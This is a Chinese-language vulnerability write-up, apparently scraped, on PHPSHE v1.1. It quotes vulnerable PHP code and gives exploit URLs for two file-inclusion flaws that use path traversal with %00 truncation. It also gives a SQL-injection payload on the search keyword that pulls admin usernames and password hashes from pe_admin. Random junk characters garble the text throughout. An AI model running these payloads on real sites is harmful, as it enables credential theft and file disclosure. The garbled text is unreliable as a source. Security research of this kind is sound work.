% z5 n, Z1 s" x6 ^, c+ @0×01 包含漏洞; r, A t* W9 P1 G
( Q) v+ l' q) v: R- ]
4 k- y& [; S0 c( ^0 m; N5 Q//首页文件% V e( \0 m' Y/ M9 K
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);* }# K: ~! k5 X$ E$ T6 s. L
include("{$pe['path_root']}module/{$module}/{$mod}.php"); //$mod可控造成“鸡肋”包含漏洞
6 F' z' _- ]# k: s y. K3 @. S) @8 rpe_result();
. ~+ A7 [3 V: `# O( Z+ Z6 O?>% H; k6 Q$ o$ B
//common 文件 第15行开始
9 I/ z6 Y, M; `- y: X% curl路由配置2 {" B& J5 B2 o" {- X4 s7 }
$module = $mod = $act = 'index';
! T2 @. h* L7 _; Z, K% S2 j+ z$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);" `! z& b/ }- s! {1 J; F
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);' M; K4 L. b9 |# x
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);' D4 r+ I+ Z3 a9 j
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
/ g) n" `3 ?( ^8 C: l) F
' U1 \' E7 N9 G: `5 T, n8 M$ X
) w3 q5 y7 @2 C. ?' \8 K8 E 0×02 搜索注入. D+ ^- B& f9 v5 o* ]$ w
6 C6 E- i* K$ U+ T; H<code id="code2">
//product.php文件' g5 D! N5 u" W% p
case 'list':
1 W3 ~1 n1 i3 S# N! ]$category_id = intval($id);
" L3 R4 w. }2 N1 Q0 o( L* C( p$info = $db->pe_select('category', array('category_id'=>$category_id));& }) j: d# M; s
//搜索3 b' E; V/ M5 P9 W' p
$sqlwhere = " and `product_state` = 1";
! R$ F& D2 Z3 S4 d) Mpe_lead('hook/category.hook.php');
( R# i/ ~7 l$ J+ Z# c1 e3 a- S% {if ($category_id) {" _' ^6 T6 C2 Q$ T# t w- ~
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
0 e" S4 q" {8 |& h# J3 x$ a/ F} t! s" ^9 R2 }: M0 {
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤( T: i) e- w, w! Q- A
if ($_g_orderby) {& S6 p- M# } N" J$ Y7 K/ q6 z
$orderby = explode('_', $_g_orderby);
) O" u, F f* u. L3 g# m$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
2 a/ h6 h+ Y' j+ v0 m0 b}5 q$ M% B$ Z8 c
else {
, a% B4 w3 }) W$sqlwhere .= " order by `product_id` desc";3 ?3 ^# j1 M4 p/ _5 l5 a. z
}
5 _2 A& [' S# {: B$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));. j9 B- T- m; ^2 M% N! D" ^) [
//热卖排行
0 X& D+ ?, K8 M/ P2 i$product_hotlist = product_hotlist();1 f& E1 {& s! X6 x0 D4 B5 |5 N' o
//当前路径( w5 h' ^( J" `4 s7 B, }
$nowpath = category_path($category_id);
# {3 o) I1 O8 `) @6 f6 i+ q; _$seo = pe_seo($info['category_name']);
) L! N3 l& ^/ m3 \0 R% z4 x2 @include(pe_tpl('product_list.html'));
. e+ h( P2 _: }7 G6 y. D0 p//跟进selectall函数库
# z7 ^9 A7 |1 Opublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
; k7 b) E6 s: p. k# r/ q1 s4 M2 a{& p& H- Z9 ]3 L7 _
//处理条件语句
6 _4 j% w% k9 ^% w1 @7 U9 g$sqlwhere = $this->_dowhere($where);
9 n4 {! d# ?; J5 I1 l. Zreturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);2 L0 h$ h5 Z& |$ Y5 O7 _$ U
}
; K) ~/ Q3 l( f5 E% k! \//exp, T! @6 U8 Y) u" p. S9 w+ }7 @9 v
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
/ m. [8 e! Z& Y% U
</code>
8 ?! }& e& ]8 f; s' ] t, T
% J* F4 E! {* Y3 k; e) X0×03 包含漏洞2
. ?, Q' @! h8 Q% y& b ~- P0 M; U) W $ N P: N2 k# K
<code id="code3">
//order.php
case 'pay':
- J2 ?. f! Q6 k8 l( V! S# l$ I$ |
$order_id = pe_dbhold($_g_id);
* h' U* I! E" i g# z6 d1 J& V6 E
$cache_payway = cache::get('payway');
+ j7 K3 g. e/ R) D3 f1 h
foreach($cache_payway as $k => $v) {
/ t! u( u! k: {# `9 M
$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
5 I+ q4 U7 q& D% y% C9 K( Oif ($k == 'bank') {
, V3 @6 y( Z1 ?2 r' o2 v
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
; D$ t( p+ z0 L3 F, b& ^, m
}
/ K7 q) q& \" Z- x}
0 G: T) w+ j; d6 C4 z* {+ g. w- Z" J$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
) X% l/ c' S# T0 K% [: R, L6 G!$order['order_id'] && pe_error('订单号错误...');
* C$ z9 D8 e' m1 a- n7 dif (isset($_p_pesubmit)) {
9 q/ ^6 L! }/ V' i6 j( A5 ~+ R) x
if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
9 n8 A! U5 h" W$ l
$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
1 m) A* F) M( I
foreach ($info_list as $v) {
0 h6 G# u. h+ q8 e, i$order['order_name'] .= "{$v['product_name']};";
& S- ]8 p- m8 L% r$ l0 U) S
9 Q; ]. o6 _/ y6 B9 S& u
}
8 }7 C, a4 x, Y7 D+ s/ Q. s% yecho '正在为您连接支付网站,请稍后...';
2 I; y ~% `& f u; [include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
% D4 j& l0 A6 H2 g7 T% U
}//当一切准备好的时候就可以进行"鸡肋包含了"
# T. _" }; A' S' X
else {
8 z2 Z5 l3 k: rpe_error('支付错误...');
% X$ R. F4 z0 m* r8 J
}
( {8 J9 r1 Y1 S% B, m
}
" l+ K5 Q4 L9 s! Y" H
$seo = pe_seo('选择支付方式');
' t" ]9 T, Q+ f/ _, yinclude(pe_tpl('order_pay.html'));
* J* W A" }2 w: ]2 n
break;
}
//exp:
//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001
//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
7 M4 D$ `. u3 E# v* l1 c$ s7 `5 P9 C